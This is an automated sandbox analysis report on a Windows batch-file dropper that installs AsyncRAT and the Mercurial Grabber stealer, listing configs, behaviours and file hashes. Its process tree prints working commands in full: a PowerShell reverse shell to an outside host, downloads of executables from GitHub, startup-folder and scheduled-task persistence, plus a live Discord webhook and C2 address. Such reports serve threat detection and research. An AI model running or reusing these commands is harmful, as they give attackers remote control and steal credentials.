Analysis
-
max time kernel
750s -
max time network
746s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 01:13
Static task
static1
General
-
Target
create.bat
-
Size
953B
-
MD5
a34e9091b3cb1b1fddb64dd1e6eafe8b
-
SHA1
73a9ce1190dbf81871d72cc98b7d81487bad17dc
-
SHA256
b79c63a1f5777b977a48085de65f8041d1d6b2d5d569224b0f81b343578f1803
-
SHA512
65391766927605aef01be482578b0f11fc9a9dfd0ee0b0a62ff1df6d07346a4b6d5a0d7409983f3fcd7b8a98e5376fd15bc8961b477be683e88ddf8e5619d0b7
Malware Config
Extracted
mercurialgrabber
https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0
Extracted
asyncrat
Default
technical-southwest.gl.at.ply.gg:58694
-
delay
1
-
install
true
-
install_file
WINDOWS.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Mercurialgrabber family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Desktop\Loader.exe family_asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe -
Blocklisted process makes network request 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 11 2136 powershell.exe 21 2136 powershell.exe 25 2136 powershell.exe 31 4076 powershell.exe 32 4076 powershell.exe 34 552 powershell.exe 36 552 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1752 powershell.exe 2136 powershell.exe 2104 powershell.exe 4076 powershell.exe 552 powershell.exe -
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Loader.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Loader.exe -
Drops startup file 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
output.exeLoader.exeWINDOWS.exepid process 1912 output.exe 5024 Loader.exe 4356 WINDOWS.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 33 ip4.seeip.org 54 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum output.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 output.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString output.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1096 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
output.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer output.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exeLoader.exeWINDOWS.exepid process 2136 powershell.exe 2136 powershell.exe 4076 powershell.exe 4076 powershell.exe 2104 powershell.exe 2104 powershell.exe 552 powershell.exe 552 powershell.exe 1752 powershell.exe 1752 powershell.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 5024 Loader.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe 4356 WINDOWS.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeoutput.exepowershell.exeLoader.exeWINDOWS.exedescription pid process Token: SeDebugPrivilege 2136 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 552 powershell.exe Token: SeDebugPrivilege 1912 output.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 5024 Loader.exe Token: SeDebugPrivilege 5024 Loader.exe Token: SeDebugPrivilege 4356 WINDOWS.exe Token: SeDebugPrivilege 4356 WINDOWS.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
cmd.exepowershell.execmd.exeLoader.execmd.execmd.exedescription pid process target process PID 4620 wrote to memory of 2136 4620 cmd.exe powershell.exe PID 4620 wrote to memory of 2136 4620 cmd.exe powershell.exe PID 2136 wrote to memory of 1360 2136 powershell.exe cmd.exe PID 2136 wrote to memory of 1360 2136 powershell.exe cmd.exe PID 1360 wrote to memory of 4076 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 4076 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 2104 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 2104 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 1912 1360 cmd.exe output.exe PID 1360 wrote to memory of 1912 1360 cmd.exe output.exe PID 1360 wrote to memory of 552 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 552 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 1752 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 1752 1360 cmd.exe powershell.exe PID 1360 wrote to memory of 5024 1360 cmd.exe Loader.exe PID 1360 wrote to memory of 5024 1360 cmd.exe Loader.exe PID 5024 wrote to memory of 2260 5024 Loader.exe cmd.exe PID 5024 wrote to memory of 2260 5024 Loader.exe cmd.exe PID 5024 wrote to memory of 3552 5024 Loader.exe cmd.exe PID 5024 wrote to memory of 3552 5024 Loader.exe cmd.exe PID 2260 wrote to memory of 3604 2260 cmd.exe schtasks.exe PID 2260 wrote to memory of 3604 2260 cmd.exe schtasks.exe PID 3552 wrote to memory of 1096 3552 cmd.exe timeout.exe PID 3552 wrote to memory of 1096 3552 cmd.exe timeout.exe PID 3552 wrote to memory of 4356 3552 cmd.exe WINDOWS.exe PID 3552 wrote to memory of 4356 3552 cmd.exe WINDOWS.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\create.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "$LHOST = 'radio-ebay.gl.at.ply.gg'; $LPORT = 10404; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) } catch { $_ }; $StreamWriter.Write('$Output`n'); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loader.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Users\Admin\Desktop\output.exeC:\Users\Admin\Desktop\output.exe4⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"4⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Users\Admin\Desktop\Loader.exeC:\Users\Admin\Desktop\Loader.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:3604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEC06.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:1096
-
-
C:\Users\Admin\AppData\Roaming\WINDOWS.exe"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5612b19feac3b60bdc771ec888769ea75
SHA1cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb
SHA2563eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1
SHA5122f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af
-
Filesize
1KB
MD53df110e480ee96b0eb33e2a49b6e9c38
SHA1ab63f7e1cae2e3c353480cf9649ed003f297f02c
SHA2566e681c03c4803b75a721a4439acf24c12b774dea7c652f6feffe57466e3d056c
SHA51237287132e7a1cf3ee34d12db777fe1c067f79bc82dda78a9bca31880fa1937a9230d309b7dd04a541c33c8523063c038ef943673bffd36d3e276cc157383fcee
-
Filesize
1KB
MD5f3f83ae17a3f81e0265b9ce7e480bd4e
SHA1994d8d5b533fd09630b45a0d0404f65557e83d5d
SHA256412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74
SHA512cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD58954a2e315c7d9204581f261242435ad
SHA131f6742e7f7da70a2e58ad7e04e735dc84a4e611
SHA25606a6c2e0d9540f7d5c877da3c74146797940cd40add424e541ddcecf8dfc4b6b
SHA51287392af42a4264758e95e4645bab5970069b1fa8ccc59a93227faae17de5ee0a0ecca0722ce25281a9ad9464a858da356caf2c0348831eef98a5daa616f3bb4e
-
Filesize
63KB
MD57ceb11ebb7a55e33a82bc3b66f554e79
SHA18dfd574ad06ded662d92d81b72f14c1914ac45b5
SHA256aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603
SHA512d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd
-
Filesize
41KB
MD5a0e598ec98a975405420be1aadaa3c2a
SHA1d861788839cfb78b5203686334c1104165ea0937
SHA256e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d
SHA512e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585